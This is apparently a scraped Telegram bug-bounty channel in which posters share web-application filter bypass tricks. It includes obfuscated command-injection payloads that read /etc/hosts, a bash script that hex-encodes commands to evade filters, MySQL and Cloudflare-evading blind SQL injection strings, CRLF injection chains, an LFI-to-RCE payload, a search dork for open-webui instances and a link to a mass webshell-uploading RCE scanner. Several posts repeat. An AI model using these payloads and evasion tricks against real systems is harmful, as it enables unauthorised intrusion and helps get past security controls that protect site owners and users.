Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
β cat /etc/hosts
β tac /e\t\c/h\o\s\t\s
β tac${IFS}/e\t\c/h\o\s\t\s
β tac /e*c/h*st*
β tac /e{t,c}*/{o,h}*s*{s,t}
β tac /??c/??sts
Let me know guy's you all wants more or not like that?
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
β cat /etc/hosts
β tac /e\t\c/h\o\s\t\s
β tac${IFS}/e\t\c/h\o\s\t\s
β tac /e*c/h*st*
β tac /e{t,c}*/{o,h}*s*{s,t}
β tac /??c/??sts
Let me know guy's you all wants more or not like that?
1β€14π±11π₯6π2
Brut Security
Hey Hunter's, DarkShadow here back again, dropping some bypass methods that definitely help you. Trying OS command injection, but WAF blocks every times? β cat /etc/hosts β
tac /e\t\c/h\o\s\t\s β
tac${IFS}/e\t\c/h\o\s\t\s β
tac /e*c/h*st* β
tac /e{t,c}*/{oβ¦
This is for copy cats who copy my posts and share without cradit:
~DarkShadow
Hey copy cats, stop copying my posts and do your self. If you don't think deeply then first learn deeply.
~DarkShadow
1π€9β€5π«‘4π₯2πΏ2
π¨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
π5
Check out this job at National Cyber Security Services: https://www.linkedin.com/jobs/view/4340448773
Linkedin
National Cyber Security Services hiring Security monitoring & incident response in Kolkata, West Bengal, India | LinkedIn
Posted 8:21:00 AM. SIEM Engineer (Open-Source & Enterprise) β SOC Deployment & TuningWeβre looking for a SIEM Engineerβ¦See this and similar jobs on LinkedIn.
β€4
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!
βWAF block: whoami
β WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
β¨Bash script:
Guy's using my this dark-hex script you can directly execute obfuscate commands in bash!
#bugbountytips #bypass
DarkShadow here back again, dropping a really interesting bypass method!
βWAF block: whoami
β WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
β¨Bash script:
#!/bin/bash
str="$1"
out=""
for ((i=0; i<${#str}; i++)); do
char="${str:i:1}"
ascii=$(printf '%d' "'$char")
hex=$(printf '%02x' "$ascii")
out="${out}\\x${hex}"
done
echo "$'$out'"
Guy's using my this dark-hex script you can directly execute obfuscate commands in bash!
#bugbountytips #bypass
π«‘18π₯7β€5
β‘οΈOutdated but Helpful Some MySQL tricks to break some #WAFs out there. βοΈ by @BRuteLogic
#infosec #cybersec #bugbountytips
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`#infosec #cybersec #bugbountytips
β€11
Hey Hunterβs,
DarkShadow is here back again!
Before Testing Complex RCE Payloads, SomeTimes You Need to Think Simple.
ππ»Like:
parameter=value id
Now Guys simply show your love β€οΈ
#bugbountytips #rce
DarkShadow is here back again!
Before Testing Complex RCE Payloads, SomeTimes You Need to Think Simple.
ππ»Like:
parameter=value id
Now Guys simply show your love β€οΈ
#bugbountytips #rce
β€20π₯7
π‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
β Bypass Payload
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
1β€11π2
Het Hunter's,
DarkShadow here back again!
β CRLF injection Explainπ₯
β οΈImpact (it can chain with):
1. XSS
2. open redirection
3. Cache Poisoning
4. Session Fixation [Inject custom Set-Cookie: eaders]
5. Inject Access-Control-Allow-Origin: * [make CORS]
6. CORS bypass to Sensitive Info Leak
7. Web Cache Deception
8. Phishing via Responds manipulation [\r\n\r\n<h1>Hacked</h1>]
Now Guy's show your love β€οΈ
#bugbountytips #crlf
DarkShadow here back again!
β CRLF injection Explainπ₯
This vulnerability allow an attacker to add there custom header on the responds! If you can inject \r\n.
β οΈImpact (it can chain with):
1. XSS
2. open redirection
3. Cache Poisoning
4. Session Fixation [Inject custom Set-Cookie: eaders]
5. Inject Access-Control-Allow-Origin: * [make CORS]
6. CORS bypass to Sensitive Info Leak
7. Web Cache Deception
8. Phishing via Responds manipulation [\r\n\r\n<h1>Hacked</h1>]
Now Guy's show your love β€οΈ
#bugbountytips #crlf
β€31π2
ATO/RCE
πDork
HUNTER : product.name="open-webui"
Please open Telegram to view this post
VIEW IN TELEGRAM
β€12
Hey,
if you feel anything here could be improved, drop your suggestion please :)
if you feel anything here could be improved, drop your suggestion please :)
π€15
Hey Hunter's,
DarkShadow here back again!
if you ever got a LFI vector parameter, then not just try LFI payloads.
Parameter: &Path= βLFI β RCE
Payload for RCE: "|id||"
#bugbountytips #rce
DarkShadow here back again!
if you ever got a LFI vector parameter, then not just try LFI payloads.
Parameter: &Path= βLFI β RCE
Payload for RCE: "|id||"
#bugbountytips #rce
β€18π₯8
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! π
Check it out! π
π https://github.com/kevin-mizu/domloggerpp
Check it out! π
π https://github.com/kevin-mizu/domloggerpp
π₯7β€3
π₯ Find All Parameters - Tool to crawl pages, find potential parameters and generate a custom target parameter wordlist
β https://github.com/ImAyrix/fallparams
β https://github.com/ImAyrix/fallparams
β€15π₯5π±3
This media is not supported in your browser
VIEW IN TELEGRAM
π28β€4π±1